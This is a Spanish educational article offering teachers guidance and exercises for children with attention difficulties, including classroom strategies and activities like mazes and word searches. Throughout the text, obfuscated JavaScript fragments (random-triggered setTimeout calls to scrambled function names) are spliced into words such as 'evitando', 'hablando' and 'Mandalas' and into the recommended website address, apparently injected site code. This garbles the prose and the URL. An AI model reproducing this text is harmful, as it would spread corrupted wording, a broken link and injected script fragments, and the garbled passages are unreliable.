ORIENTACIONES PARA EL AULA CON NIÑOS CON DIFICULTAD DE ATENCIÓN

Autora: Mª Ángeles Cortés Bernabé

          La maestra Sonia pregunta a su alumno Juan de 3º B:

- Juan ¿me podrías resumir en pocas palabras lo que acabo de explicar?

- Pues… no me he enterado maestra, pero esta tarde vamos a jugar un partido de fútbol los de 5º contra los de 6º.

          Se trata de una situación muy común en cualquier aula. Hoy en día nos encontramos en las clases con alumnos que presentan falta de atención que impide que el niño pueda centrarse en cualquier actividad que no le ofrezca un importante estímulo. Estos se acompañan de conductas impulsivas, baja tolerancia a la frustración, baja autoestima, en ocasiones problemas de conducta, agresiones, etc. y, como consecuencia, por lo general, presentan fracaso escolar.

           Buena parte del rendimiento escolar depende de la concentración. La falta de atención en los estudios desemboca en un rendimiento deficiente que puede corregirse con un aprendizaje adecuado. Lo ideal es que desde pequeños los niños se acostumbren a estar concentrados en una tarea durante unos minutos; así al llegar, a la universidad, serán capaces de leer y estudiar varias horas seguidas. Para ello, será necesario ayudarles a crear un ambiente adecuado en el colegio y en casa, así como que padres y profesores les sirvan de modelos y les enseñen técnicas adecuadas de concentración.


           Podemos ayudar a nuestros alumnos y alumnas a concentrarse en una tarea evitandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando las circunstancias que someten al niño a interferencias. Para ello desde el aula podemos tener en cuenta los siguientes aspectos:

- Huir de ejercicios repetitivos, que pueden llegar incluso a cansar a los alumnos que no tengan falta de atención

- Utilizar apoyos visuales, rimas, canciones, distintos colores para destacar lo más importante en un texto, etc.

- Hacer ver al niño donde tiene que  prestar atención para no cometer un error

- No presentar un número elevado de estímulos en las actividades (no sabrá diferenciar lo importante de lo no relevante)

- Si se le está hablandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando no utilizar otros estímulos como hacer gestos, escribir en la pizarra, etc.

- Intentar que las actividades se relacionen con los intereses del niño. Seguro que hablandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando y conociendo más a fondo al niño descubriremos intereses y motivaciones que sirvan para presentar nuevas actividades, explicaciones, ejercicios, etc.

- Aprovechar los periodos de atención del niño para realizar actividades y trabajos, es decir, si el alumno está más concentrado a las primeras horas de la mañana, aprovecharlas para realizar el trabajo un poco más complicado

- Darle tiempo al niño para cambiar de una actividad a otra, de un concepto a otro… incluso dejarle que hable un poco o se levante para relajarse.

- Podemos explicarle y hablarle haciendo que nos mire a los ojos, incluso instigándole para que lo haga, hablándole suavemente pero con firmeza. Le pediremos a continuación que repita lo que se le ha dicho para ver si ha entendido el mensaje. Ya que en ocasiones realizan las actividades mal porque simplemente no han entendido lo que le hemos pedido.

           A continuación, me gustaría señalar algunos ejemplos de ejercicios que se podrían realizar en los ratos libres o desde casa con los niños y niñas para mejorar su atención:


-  Rodear con un círculo todos los dibujos iguales al modelo.

-  Presentar dibujos con alguna incorrección importante para que el niño la descubra.

- Tachar en una lámina los dibujos repetidos.

-  Reconocimiento de errores en dibujos.

-  Sopas de letras.

-  Reproducción de figuras mediante números.

-  Ejercicios de “comeletras”.

-  Identificación de palabras.

-  Crucigramas

-  Ejercicios de completar frases o palabras

-  Laberintos

-  Sudokus adaptados al nivel del niño

-  Mandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andalas

          Además, en la página web http://orientacionandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andujar.wordpress.com/ podemos encontrar innumerables fichas para mejorar la atención.

BIBLIONET UTILIZADA:

 

 

 

 

 

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